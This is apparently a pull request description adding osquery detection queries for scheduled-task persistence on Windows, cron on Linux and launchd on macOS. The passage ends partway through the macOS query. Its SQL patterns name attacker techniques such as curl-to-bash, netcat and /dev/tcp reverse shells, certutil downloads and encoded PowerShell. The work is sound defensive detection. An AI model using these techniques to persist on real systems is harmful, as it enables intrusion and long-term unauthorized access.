[Osquery_manager] Scheduled tasks artifact saved query #16082

tomsonpl · 2025-11-21T16:32:15Z

Scheduled Tasks Artifact (Cross-Platform Persistence Detection)

The Scheduled Tasks artifact provides comprehensive visibility into OS-level persistence mechanisms across all major operating systems. This wrapper encompasses three platform-specific queries that detect suspicious scheduled execution patterns using dual-detection logic: (1) non-whitelisted tasks/jobs not in known-good allowlists and (2) Living off the Land (LotL) attack indicators that identify abuse of legitimate system utilities. Together, these queries provide complete coverage for detecting persistence via scheduled execution—one of the most common techniques used by adversaries for maintaining long-term access to compromised systems.

Core Forensic Artifacts Coverage

#	Artifact	✓	OS	Query	File	Description
1	Scheduled Tasks	✅	Windows	scheduled_tasks_windows_elastic	a1b2c3d4	Windows scheduled tasks detection with whitelist and LotL patterns
2	Scheduled Tasks	✅	Linux	crontab_linux_elastic	b2c3d4e5	Linux cron jobs detection with whitelist and LotL patterns
3	Scheduled Tasks	✅	macOS	launchd_macos_elastic	c3d4e5f6	macOS launch agents/daemons detection with whitelist and LotL patterns

Queries by Platform

🪟 Windows - Scheduled Task Persistence Detection

Description

Detects suspicious Windows scheduled tasks using dual-detection approach: (1) Non-whitelisted tasks not in known-good allowlist and (2) Living off the Land (LotL) attack indicators. Identifies both unsigned/unknown tasks AND abuse of legitimate Windows tools (powershell -e, certutil, wscript, etc.) for persistence, privilege escalation, and lateral movement. Uses path-based whitelist filtering to auto-exclude legitimate Microsoft Windows tasks from System32/SysWOW64 and known-good third-party updaters, while flagging suspicious patterns regardless of code signature. This query provides a live snapshot of currently configured tasks (not historical event log data).

Detection Focus:

PowerShell base64 encoded commands and download cradles
Execution policy bypasses and hidden windows
CertUtil, BITSAdmin, and Windows Script Host abuse
Tasks running from writable locations (Users\Public, ProgramData, Temp)
Script file execution (HTA, VBS, JS) and proxy execution (regsvr32, rundll32)
Hidden and enabled scheduled tasks from non-Microsoft paths
Non-standard tasks not matching known-good allowlist patterns
MITRE ATT&CK: T1053.005 (Scheduled Task/Job), T1059.001 (PowerShell), T1105 (Ingress Tool Transfer)

Result

Query results will show suspicious scheduled tasks with dual classification: LOTL_INDICATOR for tasks exhibiting Living off the Land techniques, NON_WHITELISTED for tasks not matching known-good patterns, or both. Results include task metadata (name, path, action, state, schedule), detection reasoning, code signature information, and file hashes for executable validation.

Platform

windows

Interval

3600 seconds (1 hour)

Query ID

scheduled_tasks_windows_elastic

ECS Field Mappings

process.name → name
process.executable → action
process.command_line → action
file.path → path
file.hash.sha256 → sha256
file.hash.sha1 → sha1
file.hash.md5 → md5
file.size → size
file.mtime → mtime
file.ctime → ctime
file.directory → directory
rule.category → type
event.outcome → state
code_signature.subject_name → subject_name
code_signature.status → signature_result
event.category → detection_method
rule.description → detection_reason

SQL Query

-- Detects suspicious scheduled tasks via whitelist and LotL patterns
-- MITRE: T1053.005, T1059.001, T1105

WITH non_whitelisted AS (
    SELECT
        st.name,
        st.action,
        st.path,
        st.enabled,
        st.state,
        st.hidden,
        st.last_run_time,
        st.next_run_time,
        st.last_run_message,
        1 AS is_non_whitelisted,
        0 AS is_lotl
    FROM scheduled_tasks AS st
    WHERE st.name IS NOT NULL
        AND st.name != ''
        AND st.action IS NOT NULL
        AND st.action != ''
        -- Whitelist: Microsoft system tasks from System32/SysWOW64
        AND NOT (
            (st.path LIKE '\Microsoft\Windows\%' OR st.path LIKE '\Microsoft\Office\%' OR st.path LIKE '\Microsoft\XblGameSave\%')
            AND (
                LOWER(st.action) LIKE '%systemroot%\system32\%'
                OR LOWER(st.action) LIKE '%windir%\system32\%'
                OR LOWER(st.action) LIKE 'c:\windows\system32\%'
                OR LOWER(st.action) LIKE '%systemroot%\syswow64\%'
                OR LOWER(st.action) LIKE '%windir%\syswow64\%'
                OR LOWER(st.action) LIKE 'c:\windows\syswow64\%'
                OR LOWER(st.action) LIKE '%programfiles%\windows defender\%'
                OR LOWER(st.action) LIKE 'c:\program files\windows defender\%'
                OR LOWER(st.action) LIKE '%program files%\microsoft office\%'
                OR LOWER(st.action) LIKE 'c:\program files\microsoft office\%'
                OR LOWER(st.action) LIKE 'c:\program files (x86)\microsoft office\%'
            )
        )
        -- Whitelist: Defender tasks from legitimate ProgramData
        AND NOT (
            st.path LIKE '\Microsoft\Windows\Windows Defender\%'
            AND (
                LOWER(st.action) LIKE 'c:\programdata\microsoft\windows defender\%'
                OR LOWER(st.action) LIKE '%\programdata\microsoft\windows defender\%'
                OR LOWER(st.action) LIKE '%\program files\windows defender\%'
            )
        )
        -- Whitelist: Edge Update tasks
        AND NOT (
            st.path LIKE '\MicrosoftEdgeUpdate%'
            OR (st.path LIKE '%EdgeUpdate%' AND st.action LIKE '%Microsoft\EdgeUpdate\%')
        )
        -- Whitelist: Common Windows executables for Microsoft tasks
        AND NOT (
            st.path LIKE '\Microsoft\Windows\%'
            AND (
                LOWER(st.action) LIKE 'sc.exe %'
                OR LOWER(st.action) LIKE 'btudtask.exe%'
                OR LOWER(st.action) LIKE 'schtasks.exe%'
                OR LOWER(st.action) LIKE '%wmpnscfg.exe%'
            )
        )
        -- Whitelist: Windows subsystem tasks
        AND NOT (
            st.path LIKE '%\Bluetooth\%'
            OR st.path LIKE '%\UPnP\%'
            OR st.path LIKE '%\UsageAndQualityInsights\%'
            OR st.path LIKE '%\Diagnosis\%'
            OR st.path LIKE '%\UpdateOrchestrator\%'
            OR st.path LIKE '%\WindowsUpdate\%'
            OR st.path LIKE '%\Defrag\%'
            OR st.path LIKE '%\Application Experience\%'
            OR st.path LIKE '%\Location\%'
            OR st.path LIKE '%\Sysmain\%'
            OR st.path LIKE '%\ApplicationData\%'
            OR st.path LIKE '%\DUSM\%'
            OR st.path LIKE '%\capabilityaccessmanager\%'
            OR st.path LIKE '%\AppxDeploymentClient\%'
            OR st.path LIKE '%\Windows Media Sharing\%'
        )
        -- Whitelist: Known-good third-party updaters (Google, Adobe, OneDrive)
        AND NOT (
            st.path LIKE '%\Google\Update%'
            AND st.action LIKE '%Google\Update\%'
        )
        AND NOT (
            st.path LIKE '%\Adobe\%'
            AND st.action LIKE '%Adobe%'
        )
        AND NOT (
            st.path LIKE '%OneDrive%'
        )
),
lotl_indicators AS (
    SELECT
        st.name,
        st.action,
        st.path,
        st.enabled,
        st.state,
        st.hidden,
        st.last_run_time,
        st.next_run_time,
        st.last_run_message,
        0 AS is_non_whitelisted,
        1 AS is_lotl,
        CASE
            WHEN st.action LIKE '%powershell% -e%' OR st.action LIKE '% -enc %' OR st.action LIKE '% -EncodedCommand %' THEN 'PowerShell base64 encoded command'
            WHEN st.action LIKE '%Invoke-WebRequest%' OR st.action LIKE '%IWR %' OR st.action LIKE '%Invoke-RestMethod%' THEN 'PowerShell download cradle'
            WHEN st.action LIKE '%-ExecutionPolicy Bypass%' OR st.action LIKE '%-ep bypass%' THEN 'PowerShell execution policy bypass'
            WHEN st.action LIKE '%-w hidden%' OR st.action LIKE '%-windowstyle hidden%' THEN 'PowerShell hidden window'
            WHEN st.action LIKE '%IEX(%' OR st.action LIKE '%Invoke-Expression%' THEN 'PowerShell obfuscated command'
            WHEN st.action LIKE '%[Convert]::FromBase64String%' THEN 'PowerShell base64 decode obfuscation'
            WHEN st.action LIKE '%certutil% -urlcache%' OR st.action LIKE '%certutil% -f%' THEN 'CertUtil download abuse'
            WHEN st.action LIKE '%bitsadmin% /transfer%' THEN 'BITSAdmin download abuse'
            WHEN (st.action LIKE '%C:\Users\Public\%' OR st.action LIKE '%C:\ProgramData\%') AND st.action NOT LIKE '%\ProgramData\Microsoft\Windows Defender\%' THEN 'Suspicious file path (writable by low-priv users)'
            WHEN st.action LIKE '%\Temp\%' OR st.action LIKE '%\AppData\Local\Temp\%' THEN 'Execution from Temp directory'
            WHEN st.action LIKE '%wscript.exe%' OR st.action LIKE '%cscript.exe%' THEN 'Windows Script Host abuse'
            WHEN st.action LIKE '%mshta.exe%' THEN 'MSHTA.exe abuse'
            WHEN st.action LIKE '%.hta%' OR st.action LIKE '%.vbs%' OR st.action LIKE '%.js%' THEN 'Script file execution'
            WHEN (st.action LIKE '%regsvr32%' OR st.action LIKE '%rundll32%') AND st.path NOT LIKE '\Microsoft\Windows\%' THEN 'Proxy execution via regsvr32/rundll32'
            WHEN st.action LIKE '%msiexec%' THEN 'MSI package execution'
            WHEN st.hidden = 1 AND st.enabled = 1
                AND st.path NOT LIKE '\Microsoft\Windows\%'
                AND st.path NOT LIKE '\Microsoft\Office\%'
                AND st.path NOT LIKE '\Microsoft\XblGameSave\%'
                AND st.path NOT LIKE '\Microsoft\EdgeUpdate\%'
                AND st.path NOT LIKE '\MicrosoftEdgeUpdate%'
                AND st.path NOT LIKE '%OneDrive%'
            THEN 'Hidden and enabled scheduled task'
            ELSE 'Unknown LotL pattern'
        END AS lotl_reason
    FROM scheduled_tasks AS st
    WHERE st.name IS NOT NULL
        AND st.name != ''
        AND st.action IS NOT NULL
        AND st.action != ''
        AND (
            st.action LIKE '%powershell% -e%'
            OR st.action LIKE '% -enc %'
            OR st.action LIKE '% -EncodedCommand %'
            OR st.action LIKE '%Invoke-WebRequest%'
            OR st.action LIKE '%IWR %'
            OR st.action LIKE '%Invoke-RestMethod%'
            OR st.action LIKE '%-ExecutionPolicy Bypass%'
            OR st.action LIKE '%-ep bypass%'
            OR st.action LIKE '%-w hidden%'
            OR st.action LIKE '%-windowstyle hidden%'
            OR st.action LIKE '%IEX(%'
            OR st.action LIKE '%Invoke-Expression%'
            OR st.action LIKE '%[Convert]::FromBase64String%'
            OR st.action LIKE '%certutil% -urlcache%'
            OR st.action LIKE '%certutil% -f%'
            OR st.action LIKE '%bitsadmin% /transfer%'
            OR (st.action LIKE '%C:\Users\Public\%' AND st.action NOT LIKE '%\ProgramData\Microsoft\Windows Defender\%')
            OR (st.action LIKE '%C:\ProgramData\%' AND st.action NOT LIKE '%\ProgramData\Microsoft\Windows Defender\%')
            OR st.action LIKE '%\Temp\%'
            OR st.action LIKE '%\AppData\Local\Temp\%'
            OR st.action LIKE '%wscript.exe%'
            OR st.action LIKE '%cscript.exe%'
            OR st.action LIKE '%mshta.exe%'
            OR st.action LIKE '%.hta%'
            OR st.action LIKE '%.vbs%'
            OR st.action LIKE '%.js%'
            OR (st.action LIKE '%regsvr32%' AND st.path NOT LIKE '\Microsoft\Windows\%')
            OR (st.action LIKE '%rundll32%' AND st.path NOT LIKE '\Microsoft\Windows\%')
            OR st.action LIKE '%msiexec%'
            OR (
                st.hidden = 1 AND st.enabled = 1
                AND st.path NOT LIKE '\Microsoft\Windows\%'
                AND st.path NOT LIKE '\Microsoft\Office\%'
                AND st.path NOT LIKE '\Microsoft\XblGameSave\%'
                AND st.path NOT LIKE '\Microsoft\EdgeUpdate\%'
                AND st.path NOT LIKE '\MicrosoftEdgeUpdate%'
                AND st.path NOT LIKE '%OneDrive%'
            )
        )
),
combined AS (
    SELECT
        st.name,
        st.action,
        st.path,
        st.enabled,
        st.state,
        st.hidden,
        st.last_run_time,
        st.next_run_time,
        st.last_run_message,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN 'Scheduled Task (LotL)'
            ELSE 'Scheduled Task'
        END AS type,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1 AND MAX(COALESCE(nw.is_non_whitelisted, 0)) = 1
            THEN 'LOTL_INDICATOR + NON_WHITELISTED'
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN 'LOTL_INDICATOR'
            ELSE 'NON_WHITELISTED'
        END AS detection_method,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1 AND MAX(COALESCE(nw.is_non_whitelisted, 0)) = 1
            THEN MAX(li.lotl_reason) || ' + Not in known-good allowlist'
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN MAX(li.lotl_reason)
            ELSE 'Scheduled task not in known-good allowlist'
        END AS detection_reason
    FROM scheduled_tasks AS st
    LEFT JOIN non_whitelisted AS nw ON st.name = nw.name AND st.path = nw.path AND st.action = nw.action
    LEFT JOIN lotl_indicators AS li ON st.name = li.name AND st.path = li.path AND st.action = li.action
    WHERE COALESCE(nw.is_non_whitelisted, 0) = 1 OR COALESCE(li.is_lotl, 0) = 1
    GROUP BY st.name, st.path, st.action, st.enabled, st.state, st.hidden, st.last_run_time, st.next_run_time, st.last_run_message
)
SELECT
    c.name,
    c.action,
    c.path,
    c.type,
    c.enabled,
    c.state,
    c.hidden,
    c.last_run_time,
    c.next_run_time,
    c.last_run_message,
    c.detection_method,
    c.detection_reason,
    a.subject_name,
    a.result AS signature_result,
    h.sha256,
    h.sha1,
    h.md5,
    f.size,
    f.mtime,
    f.ctime,
    f.directory
FROM combined AS c
LEFT JOIN authenticode AS a ON c.action = a.path
LEFT JOIN hash AS h ON c.action = h.path
LEFT JOIN file AS f ON c.action = f.path
ORDER BY
    CASE WHEN c.detection_method LIKE 'LOTL_INDICATOR%' THEN 0 ELSE 1 END,
    c.detection_reason,
    c.hidden DESC,
    c.name

🐧 Linux - Cron Job Persistence Detection

Description

Detects suspicious Linux cron jobs using dual-detection approach: (1) Non-whitelisted cron jobs not in known-good allowlist and (2) Living off the Land (LotL) attack indicators. Identifies both non-standard cron jobs AND abuse of legitimate Unix tools (curl|bash, nc -e, base64 -d, etc.) for persistence, privilege escalation, and lateral movement. Uses path-based and command-based whitelist filtering to auto-exclude legitimate system cron jobs (cron.d, cron.daily, package managers, system maintenance tasks) while flagging suspicious patterns regardless of location. Supports multiple distributions (Ubuntu, Debian, CentOS, RHEL, Fedora, openSUSE). This query provides a live snapshot of currently configured cron jobs (not historical event log data).

Detection Focus:

Download and pipe to shell patterns (curl|bash, wget|sh)
Reverse shells via netcat, bash network redirection, socat
Base64 decode for obfuscation and encoded command execution
Shell command execution via -c flag and interactive shell invocation
One-liner execution (Python, Perl, Ruby, PHP)
Execution from temporary/writable directories (/tmp, /dev/shm, /var/tmp)
Sudo without password prompt and setuid bit modifications
SSH authorized_keys manipulation and crontab modification persistence
Non-standard cron jobs not matching known-good system maintenance patterns
MITRE ATT&CK: T1053.003 (Cron), T1059.004 (Unix Shell), T1105 (Ingress Tool Transfer)

Result

Query results will show suspicious cron jobs with dual classification: LOTL_INDICATOR for jobs exhibiting Living off the Land techniques, NON_WHITELISTED for jobs not matching known-good patterns, or both. Results include cron metadata (command, path, schedule, owner), detection reasoning, and file hashes for executable validation.

Platform

linux

Interval

3600 seconds (1 hour)

Query ID

crontab_linux_elastic

ECS Field Mappings

event.category → detection_method
rule.description → detection_reason
rule.category → type
process.command_line → command
process.executable → executable_path
file.path → executable_path
file.hash.sha256 → sha256
file.hash.sha1 → sha1
file.hash.md5 → md5
file.size → size
file.mtime → mtime
file.ctime → ctime
file.directory → directory
file.uid → uid
file.gid → gid
file.mode → mode
user.name → crontab_owner

SQL Query

-- Detects suspicious cron jobs via whitelist and LotL patterns
-- MITRE: T1053.003, T1059.004, T1105
-- Multi-distro support: Ubuntu, Debian, CentOS, RHEL, Fedora, openSUSE, Arch

WITH non_whitelisted AS (
    SELECT
        c.command,
        c.path AS crontab_path,
        c.event,
        c.minute,
        c.hour,
        c.day_of_month,
        c.month,
        c.day_of_week,
        CASE
            WHEN c.command LIKE '/%' THEN
                CASE
                    WHEN INSTR(c.command, ' ') > 0 THEN SUBSTR(c.command, 1, INSTR(c.command, ' ') - 1)
                    ELSE c.command
                END
            ELSE NULL
        END AS executable_path,
        CASE
            WHEN c.path LIKE '/var/spool/cron/crontabs/%' THEN REPLACE(c.path, '/var/spool/cron/crontabs/', '')
            WHEN c.path LIKE '/var/spool/cron/%' THEN REPLACE(c.path, '/var/spool/cron/', '')
            ELSE 'system'
        END AS crontab_owner,
        1 AS is_non_whitelisted,
        0 AS is_lotl
    FROM crontab AS c
    WHERE c.command IS NOT NULL
        AND c.command != ''
        -- Whitelist: System cron with standard executable paths
        AND NOT (
            (c.path LIKE '/etc/cron.d/%'
                OR c.path LIKE '/etc/cron.daily/%'
                OR c.path LIKE '/etc/cron.hourly/%'
                OR c.path LIKE '/etc/cron.weekly/%'
                OR c.path LIKE '/etc/cron.monthly/%'
                OR c.path = '/etc/crontab'
            )
            AND (
                c.command LIKE '/usr/bin/%'
                OR c.command LIKE '/usr/sbin/%'
                OR c.command LIKE '/bin/%'
                OR c.command LIKE '/sbin/%'
                OR c.command LIKE '/usr/local/bin/%'
                OR c.command LIKE '/usr/local/sbin/%'
            )
        )
        -- Whitelist: Package managers and system maintenance
        AND NOT (
            c.command LIKE '%apt %'
            OR c.command LIKE '%apt-get %'
            OR c.command LIKE '%dpkg %'
            OR c.command LIKE '%yum %'
            OR c.command LIKE '%dnf %'
            OR c.command LIKE '%zypper %'
            OR c.command LIKE '%pacman %'
            OR c.command LIKE '%anacron %'
            OR c.command LIKE '%logrotate %'
            OR c.command LIKE '%mandb %'
            OR c.command LIKE '%man-db %'
            OR c.command LIKE '%updatedb %'
            OR c.command LIKE '%mlocate %'
            OR c.command LIKE '%run-parts %'
            OR (c.command LIKE '%/etc/cron.%' AND c.path LIKE '/etc/crontab')
        )
        -- Whitelist: Ubuntu/Debian system packages (sysstat, e2fsprogs, etc.)
        AND NOT (
            c.path LIKE '/etc/cron.d/%'
            AND (
                c.command LIKE '%debian-sa1%'
                OR c.command LIKE '%/usr/lib/sysstat/%'
                OR c.command LIKE '%e2scrub%'
                OR c.command LIKE '%/usr/lib/%/e2fsprogs/%'
                OR c.command LIKE '%apt-compat%'
                OR c.command LIKE '%dpkg%'
                OR c.command LIKE '%update-notifier%'
                OR c.command LIKE '%popularity-contest%'
            )
        )
        -- Whitelist: System binaries from /etc/cron.d/ (excludes /tmp, /var/tmp, /dev/shm)
        AND NOT (
            c.path LIKE '/etc/cron.d/%'
            AND (
                c.command LIKE '%/sbin/%'
                OR c.command LIKE '%/usr/sbin/%'
                OR c.command LIKE '%/bin/%'
                OR c.command LIKE '%/usr/bin/%'
                OR c.command LIKE '%/usr/lib/%'
            )
            AND c.command NOT LIKE '%/tmp/%'
            AND c.command NOT LIKE '%/var/tmp/%'
            AND c.command NOT LIKE '%/dev/shm/%'
        )
        -- Whitelist: Root crontabs with standard paths (excludes curl, wget, nc)
        AND NOT (
            c.path = '/var/spool/cron/crontabs/root'
            AND (
                c.command LIKE '/usr/bin/%'
                OR c.command LIKE '/usr/sbin/%'
                OR c.command LIKE '/bin/%'
                OR c.command LIKE '/sbin/%'
            )
            AND c.command NOT LIKE '%curl%'
            AND c.command NOT LIKE '%wget%'
            AND c.command NOT LIKE '%nc %'
            AND c.command NOT LIKE '%netcat%'
        )
),
lotl_indicators AS (
    SELECT
        c.command,
        c.path AS crontab_path,
        c.event,
        c.minute,
        c.hour,
        c.day_of_month,
        c.month,
        c.day_of_week,
        CASE
            WHEN c.command LIKE '/%' THEN
                CASE
                    WHEN INSTR(c.command, ' ') > 0 THEN SUBSTR(c.command, 1, INSTR(c.command, ' ') - 1)
                    ELSE c.command
                END
            ELSE NULL
        END AS executable_path,
        CASE
            WHEN c.path LIKE '/var/spool/cron/crontabs/%' THEN REPLACE(c.path, '/var/spool/cron/crontabs/', '')
            WHEN c.path LIKE '/var/spool/cron/%' THEN REPLACE(c.path, '/var/spool/cron/', '')
            ELSE 'system'
        END AS crontab_owner,
        0 AS is_non_whitelisted,
        1 AS is_lotl,
        CASE
            WHEN c.command LIKE '%curl%|%bash%' OR c.command LIKE '%curl%|%sh%' THEN 'Download and pipe to shell (curl|bash)'
            WHEN c.command LIKE '%wget%|%bash%' OR c.command LIKE '%wget%|%sh%' THEN 'Download and pipe to shell (wget|sh)'
            WHEN c.command LIKE '%curl %http%' OR c.command LIKE '%wget %http%' THEN 'Download utility with remote URL'
            WHEN c.command LIKE '%nc -e%' OR c.command LIKE '%ncat -e%' THEN 'Reverse shell via netcat'
            WHEN c.command LIKE '%/dev/tcp/%' OR c.command LIKE '%/dev/udp/%' THEN 'Bash network redirection (reverse shell)'
            WHEN c.command LIKE '%socat%TCP%' OR c.command LIKE '%socat%EXEC%' THEN 'Socat reverse shell'
            WHEN c.command LIKE '%base64 -d%' OR c.command LIKE '%base64 --decode%' OR c.command LIKE '%base64 -D%' THEN 'Base64 decode for obfuscation'
            WHEN c.command LIKE '%echo%|%base64%' THEN 'Base64 encoded command execution'
            WHEN c.command LIKE '%bash -c%' OR c.command LIKE '%sh -c%' THEN 'Shell command execution via -c flag'
            WHEN c.command LIKE '%bash -i%' OR c.command LIKE '%sh -i%' THEN 'Interactive shell invocation'
            WHEN c.command LIKE '%python -c%' OR c.command LIKE '%python3 -c%' THEN 'Python one-liner execution'
            WHEN c.command LIKE '%perl -e%' THEN 'Perl one-liner execution'
            WHEN c.command LIKE '%ruby -e%' THEN 'Ruby one-liner execution'
            WHEN c.command LIKE '%php -r%' THEN 'PHP one-liner execution'
            WHEN c.command LIKE '%/tmp/%' THEN 'Execution from /tmp directory'
            WHEN c.command LIKE '%/dev/shm/%' THEN 'Execution from /dev/shm (world-writable memory filesystem)'
            WHEN c.command LIKE '%/var/tmp/%' THEN 'Execution from /var/tmp directory'
            WHEN c.command LIKE '%./%' OR c.command LIKE '%/.%' THEN 'Execution from hidden directory'
            WHEN c.command LIKE '%sudo -n%' OR c.command LIKE '%sudo --non-interactive%' THEN 'Sudo without password prompt'
            WHEN c.command LIKE '%chmod +s%' OR c.command LIKE '%chmod 4755%' OR c.command LIKE '%chmod 4777%' THEN 'Setuid bit modification (privilege escalation)'
            WHEN c.command LIKE '%authorized_keys%' AND (c.command LIKE '%echo%' OR c.command LIKE '%cat%' OR c.command LIKE '%>>%') THEN 'SSH authorized_keys manipulation'
            WHEN c.command LIKE '%crontab -e%' OR c.command LIKE '%crontab -%' THEN 'Crontab modification (persistence)'
            WHEN c.command LIKE '%nohup%&%' OR c.command LIKE '%disown%' THEN 'Background process persistence'
            WHEN c.command LIKE '%nc %' OR c.command LIKE '%netcat%' THEN 'Netcat network utility abuse'
            WHEN c.command LIKE '%eval%' OR c.command LIKE '%exec%' THEN 'Eval/exec command execution'
            ELSE 'Unknown LotL pattern'
        END AS lotl_reason
    FROM crontab AS c
    WHERE c.command IS NOT NULL
        AND c.command != ''
        AND (
            c.command LIKE '%curl%|%bash%'
            OR c.command LIKE '%curl%|%sh%'
            OR c.command LIKE '%wget%|%bash%'
            OR c.command LIKE '%wget%|%sh%'
            OR c.command LIKE '%curl %http%'
            OR c.command LIKE '%wget %http%'
            OR c.command LIKE '%nc -e%'
            OR c.command LIKE '%ncat -e%'
            OR c.command LIKE '%/dev/tcp/%'
            OR c.command LIKE '%/dev/udp/%'
            OR c.command LIKE '%socat%TCP%'
            OR c.command LIKE '%socat%EXEC%'
            OR c.command LIKE '%base64 -d%'
            OR c.command LIKE '%base64 --decode%'
            OR c.command LIKE '%base64 -D%'
            OR c.command LIKE '%echo%|%base64%'
            OR c.command LIKE '%bash -c%'
            OR c.command LIKE '%sh -c%'
            OR c.command LIKE '%bash -i%'
            OR c.command LIKE '%sh -i%'
            OR c.command LIKE '%python -c%'
            OR c.command LIKE '%python3 -c%'
            OR c.command LIKE '%perl -e%'
            OR c.command LIKE '%ruby -e%'
            OR c.command LIKE '%php -r%'
            OR c.command LIKE '%/tmp/%'
            OR c.command LIKE '%/dev/shm/%'
            OR c.command LIKE '%/var/tmp/%'
            OR c.command LIKE '%./%'
            OR c.command LIKE '%/.%'
            OR c.command LIKE '%sudo -n%'
            OR c.command LIKE '%sudo --non-interactive%'
            OR c.command LIKE '%chmod +s%'
            OR c.command LIKE '%chmod 4755%'
            OR c.command LIKE '%chmod 4777%'
            OR (c.command LIKE '%authorized_keys%' AND (c.command LIKE '%echo%' OR c.command LIKE '%cat%' OR c.command LIKE '%>>%'))
            OR c.command LIKE '%crontab -e%'
            OR c.command LIKE '%crontab -%'
            OR c.command LIKE '%nohup%&%'
            OR c.command LIKE '%disown%'
            OR c.command LIKE '%nc %'
            OR c.command LIKE '%netcat%'
            OR c.command LIKE '%eval%'
            OR c.command LIKE '%exec%'
        )
),
combined AS (
    SELECT
        c.command,
        c.path AS crontab_path,
        c.event,
        c.minute,
        c.hour,
        c.day_of_month,
        c.month,
        c.day_of_week,
        COALESCE(
            MAX(li.executable_path),
            MAX(nw.executable_path)
        ) AS executable_path,
        COALESCE(
            MAX(li.crontab_owner),
            MAX(nw.crontab_owner)
        ) AS crontab_owner,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN 'Cron Job (LotL)'
            ELSE 'Cron Job'
        END AS type,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1 AND MAX(COALESCE(nw.is_non_whitelisted, 0)) = 1
            THEN 'LOTL_INDICATOR + NON_WHITELISTED'
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN 'LOTL_INDICATOR'
            ELSE 'NON_WHITELISTED'
        END AS detection_method,
        CASE
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1 AND MAX(COALESCE(nw.is_non_whitelisted, 0)) = 1
            THEN MAX(li.lotl_reason) || ' + Not in known-good allowlist'
            WHEN MAX(COALESCE(li.is_lotl, 0)) = 1
            THEN MAX(li.lotl_reason)
            ELSE 'Cron job not in known-good allowlist'
        END AS detection_reason
    FROM crontab AS c
    LEFT JOIN non_whitelisted AS nw ON c.command = nw.command AND c.path = nw.crontab_path
    LEFT JOIN lotl_indicators AS li ON c.command = li.command AND c.path = li.crontab_path
    WHERE COALESCE(nw.is_non_whitelisted, 0) = 1 OR COALESCE(li.is_lotl, 0) = 1
    GROUP BY c.command, c.path, c.event, c.minute, c.hour, c.day_of_month, c.month, c.day_of_week
)
SELECT
    c.command,
    c.crontab_path,
    c.event,
    c.minute,
    c.hour,
    c.day_of_month,
    c.month,
    c.day_of_week,
    c.executable_path,
    c.crontab_owner,
    c.type,
    c.detection_method,
    c.detection_reason,
    h.sha256,
    h.sha1,
    h.md5,
    f.size,
    f.mtime,
    f.ctime,
    f.directory,
    f.uid,
    f.gid,
    f.mode
FROM combined AS c
LEFT JOIN hash AS h ON c.executable_path = h.path
LEFT JOIN file AS f ON c.executable_path = f.path
ORDER BY
    CASE WHEN c.detection_method LIKE 'LOTL_INDICATOR%' THEN 0 ELSE 1 END,
    c.detection_reason,
    c.crontab_owner,
    c.command

🍎 macOS - Launch Agent/Daemon Persistence Detection

Description

Detects suspicious macOS Launch Agents and Launch Daemons using dual-detection approach: (1) Non-whitelisted launch agents/daemons not in known-good allowlist and (2) Living off the Land (LotL) attack indicators. Identifies both non-standard persistence mechanisms AND abuse of legitimate macOS/Unix tools (curl, osascript, bash -c, base64 -d, etc.) for persistence, privilege escalation, and lateral movement. Uses path-based and code signature whitelist filtering to auto-exclude legitimate Apple system agents/daemons and known-good third-party software, while flagging suspicious patterns and unsigned binaries. This query provides a live snapshot of currently configured launch agents/daemons (not historical event log data). Final filter ensures results contain either LotL indicators OR unsigned/non-Apple signed binaries.

Detection Focus:

Download utilities (curl, wget) abuse and download-and-pipe-to-shell patterns
Reverse shells via netcat, bash network redirection, socat
Execution from temporary/writable directories (/tmp, /var/tmp, Downloads, Desktop)
Base64 decode for obfuscation and encoded command execution
Shell command execution via -c flag and interactive shell invocation
One-liner execution (Python, Perl, Ruby, PHP) and AppleScript execution abuse
Persistent agents/daemons with auto-restart and periodic execution
SSH key access, Keychain credential access, and sudo without password prompt
Unsigned binaries or non-Apple signed executables (filtered in final WHERE clause)
MITRE ATT&CK: T1543.001 (Launch Agent), T1543.004 (Launch Daemon), T1059.004 (Unix Shell), T1105 (Ingress Tool Transfer), T1547.011 (Plist Modification)

Result

Query results will show suspicious launch agents/daemons with dual classification: LOTL_INDICATOR for items exhibiting Living off the Land techniques, NON_WHITELISTED for items not matching known-good patterns, or both. Results are filtered to include only items with LotL indicators OR unsigned/non-Apple signed binaries. Results include launch item metadata (name, path, program, arguments, schedule, status), detection reasoning, code signature information, and file hashes for executable validation.

Platform

darwin

Interval

3600 seconds (1 hour)

Query ID

launchd_macos_elastic

ECS Field Mappings

event.category → detection_method
rule.description → detection_reason
rule.category → type
event.outcome → status
process.name → name
process.executable → program
process.command_line → program_arguments
file.path → program
file.hash.sha256 → sha256
file.hash.sha1 → sha1
file.hash.md5 → md5
file.size → size
file.mtime → mtime
file.ctime → ctime
file.directory → directory
code_signature.signed → signed
code_signature.subject_name → identifier
user.name → username
service.id → name

SQL Query

-- Detects suspicious launch agents/daemons via whitelist and LotL patterns
-- MITRE: T1543.001, T1543.004, T1059.004, T1105, T1547.011
-- Final filter: LOTL OR unsigned OR non-Apple signed

WITH non_whitelisted AS (
    SELECT
        l.name,
        l.path,
        l.program,
        l.program_arguments,
        l.run_at_load,
        l.keep_alive,
        l.on_demand,
        l.disabled,
        l.username,
        l.groupname,
        l.stdout_path,
        l.stderr_path,
        l.start_interval,
        CASE
            WHEN l.disabled = 1 THEN 'disabled'
            WHEN l.run_at_load = 1 THEN 'enabled_run_at_load'
            ELSE 'enabled'
        END AS status,
        1 AS is_non_whitelisted,
        0 AS is_lotl
    FROM launchd AS l
    WHERE l.name IS NOT NULL
        AND l.name != ''
        AND l.program IS NOT NULL
        AND l.program != ''
        -- Whitelist: Apple system paths with com.apple naming
        AND NOT (
            (l.path LIKE '/System/Library/LaunchDaemons/com.apple.%'
                OR l.path LIKE '/System/Library/LaunchAgents/com.apple.%')
            AND l.name LIKE 'com.apple.%'
        )
        -- Whitelist: Apple Library paths
        AND NOT (
            l.path LIKE '/Library/Apple/%'
            AND l.name LIKE 'com.apple.%'
        )
        -- Whitelist: Known-good third-party vendors
        AND NOT (
            (l.path LIKE '/Library/LaunchAgents/com.google.%' OR l.path LIKE '/Library/LaunchDaemons/com.google.%')
            AND l.name LIKE 'com.google.%'
